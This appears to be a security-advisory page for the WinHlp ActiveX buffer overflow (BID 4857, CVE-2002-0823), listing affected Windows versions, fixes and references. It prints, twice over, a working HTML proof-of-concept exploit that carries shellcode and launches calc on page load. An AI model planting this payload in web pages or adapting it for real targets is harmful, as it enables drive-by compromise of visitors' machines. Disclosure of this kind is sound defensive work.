Microsoft Windows WinHlp Item Buffer Overflow Vulnerability
BID:4857
Info
Microsoft Windows WinHlp Item Buffer Overflow Vulnerability
| Bugtraq ID: | 4857 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-2002-0823 |
| Remote: | Yes |
| Local: | No |
| Published: | May 27 2002 12:00AM |
| Updated: | Nov 01 2007 09:56PM |
| Credit: | Vulnerability discovery credited to Next Generation Security Software. |
| Vulnerable: |
Microsoft Windows XP Professional Microsoft Windows XP Home Microsoft Windows NT Workstation 4.0 SP6a Microsoft Windows NT Workstation 4.0 SP6 Microsoft Windows NT Workstation 4.0 SP5 Microsoft Windows NT Workstation 4.0 SP4 Microsoft Windows NT Workstation 4.0 SP3 Microsoft Windows NT Workstation 4.0 SP2 Microsoft Windows NT Workstation 4.0 SP1 Microsoft Windows NT Workstation 4.0 Microsoft Windows NT Terminal Server 4.0 SP6 Microsoft Windows NT Terminal Server 4.0 SP5 Microsoft Windows NT Terminal Server 4.0 SP4 Microsoft Windows NT Terminal Server 4.0 SP3 Microsoft Windows NT Terminal Server 4.0 SP2 Microsoft Windows NT Terminal Server 4.0 SP1 Microsoft Windows NT Terminal Server 4.0 Microsoft Windows NT Server 4.0 SP6a Microsoft Windows NT Server 4.0 SP6 Microsoft Windows NT Server 4.0 SP5 Microsoft Windows NT Server 4.0 SP4 Microsoft Windows NT Server 4.0 SP3 Microsoft Windows NT Server 4.0 SP2 Microsoft Windows NT Server 4.0 SP1 Microsoft Windows NT Server 4.0 Microsoft Windows NT Enterprise Server 4.0 SP6a Microsoft Windows NT Enterprise Server 4.0 SP6 Microsoft Windows NT Enterprise Server 4.0 SP5 Microsoft Windows NT Enterprise Server 4.0 SP4 Microsoft Windows NT Enterprise Server 4.0 SP3 Microsoft Windows NT Enterprise Server 4.0 SP2 Microsoft Windows NT Enterprise Server 4.0 SP1 Microsoft Windows NT Enterprise Server 4.0 Microsoft Windows ME Microsoft Windows 98 Microsoft Windows 95 Microsoft Windows 2000 Terminal Services SP2 Microsoft Windows 2000 Terminal Services SP1 Microsoft Windows 2000 Terminal Services Microsoft Windows 2000 Server SP2 Microsoft Windows 2000 Server SP1 Microsoft Windows 2000 Server Microsoft Windows 2000 Professional SP2 Microsoft Windows 2000 Professional SP1 Microsoft Windows 2000 Professional Microsoft Windows 2000 Datacenter Server SP2 Microsoft Windows 2000 Datacenter Server SP1 Microsoft Windows 2000 Datacenter Server Microsoft Windows 2000 Advanced Server SP2 Microsoft Windows 2000 Advanced Server SP1 Microsoft Windows 2000 Advanced Server |
| Not Vulnerable: | |
Exploit / POC
Microsoft Windows WinHlp Item Buffer Overflow Vulnerability
The following proof-of-concept code will open the calculator on the client system:
<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
type=application/x-oleobject width=0><PARAM NAME="Width"
VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"
VALUE="WinHelp"><PARAM NAME="Item1"
VALUE="^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã3Ã?Phcalc^Ã4$ƒÃ?PV¸¯§éw^?Ã3Ã?P¾”^Ãéw^?Ã?AAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP
PPPQQQQRRRRSSSSTTTAAAA©õwABCDEFGH^Ã�^?ægMyWindow"><PARAM
NAME="Item2" VALUE="NGS Software LTD"></OBJECT>
<SCRIPT>winhelp.HHClick()</SCRIPT>
UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
The following proof-of-concept code will open the calculator on the client system:
<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
type=application/x-oleobject width=0><PARAM NAME="Width"
VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"
VALUE="WinHelp"><PARAM NAME="Item1"
VALUE="^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã3Ã?Phcalc^Ã4$ƒÃ?PV¸¯§éw^?Ã3Ã?P¾”^Ãéw^?Ã?AAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP
PPPQQQQRRRRSSSSTTTAAAA©õwABCDEFGH^Ã�^?ægMyWindow"><PARAM
NAME="Item2" VALUE="NGS Software LTD"></OBJECT>
<SCRIPT>winhelp.HHClick()</SCRIPT>
UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
Solution / Fix
Microsoft Windows WinHlp Item Buffer Overflow Vulnerability
Solution:
** IMPORTANT NOTE: The discoverer of this issue has reported that it has been fixed in Microsoft Windows 2000 SP3. Symantec has not been able to identify this specific issue in the list of those addressed by this Service Pack. However, SP3 addresses a number of other issues, so administrators are advised to apply it as soon as possible.
**** There have been reports that this issue is not in fact resolved in Microsoft Windows 2000 SP3.
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Datacenter Server SP2
Solution:
** IMPORTANT NOTE: The discoverer of this issue has reported that it has been fixed in Microsoft Windows 2000 SP3. Symantec has not been able to identify this specific issue in the list of those addressed by this Service Pack. However, SP3 addresses a number of other issues, so administrators are advised to apply it as soon as possible.
**** There have been reports that this issue is not in fact resolved in Microsoft Windows 2000 SP3.
Microsoft Windows 2000 Server SP2
-
Microsoft Windows 2000 SP3
http://www.microsoft.com/windows2000/downloads/servicepacks/sp3/sp3lan g.asp
Microsoft Windows 2000 Advanced Server SP2
-
Microsoft Windows 2000 SP3
http://www.microsoft.com/windows2000/downloads/servicepacks/sp3/sp3lan g.asp
Microsoft Windows 2000 Professional SP2
-
Microsoft Windows 2000 SP3
http://www.microsoft.com/windows2000/downloads/servicepacks/sp3/sp3lan g.asp
Microsoft Windows 2000 Datacenter Server SP2
-
Microsoft Windows 2000 SP3
http://www.microsoft.com/windows2000/downloads/servicepacks/sp3/sp3lan g.asp
References
Microsoft Windows WinHlp Item Buffer Overflow Vulnerability
References:
References:
- Windows 2000 Service Pack 3 (Microsoft)
- Windows Help System (Next Generation Security Software)
- WinHlp32 exploit (CORE Security)